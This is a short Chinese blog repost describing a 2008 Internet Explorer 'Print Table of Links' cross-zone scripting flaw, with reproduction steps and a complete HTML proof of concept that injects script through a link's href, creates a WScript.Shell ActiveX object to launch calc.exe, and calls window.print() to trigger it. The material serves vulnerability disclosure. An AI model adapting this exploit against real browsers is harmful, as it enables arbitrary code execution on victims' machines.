MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability 具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx
如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它
重现:
1.下面这个地方打上勾
2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)
1<html>2<body>3Print me with table of links to execute calc.exe4<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a>5<script>window.print();</script>6</body>7</html>这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。
From:Sowhat的blog